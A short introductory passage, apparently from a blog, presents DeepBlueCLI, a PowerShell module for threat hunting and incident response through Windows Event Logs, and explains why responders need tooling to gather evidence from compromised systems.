Endpoint Incident Response using - DeepBlue CLI
DeepBlueCLI by Eric Conrad is a powershell module that can be used for Threat Hunting and Incident Response via Windows Event Logs.
From an incident response perspective, identifying the patient zero during the incident or an infection is just the tip of the ice berg. A responder must gather evidence, artifacts, and data about the compromised systems and having the right tool to execute these actions is a mus. Not only does it automate everything, but it also helps the responder to reduce the time to solve the issue.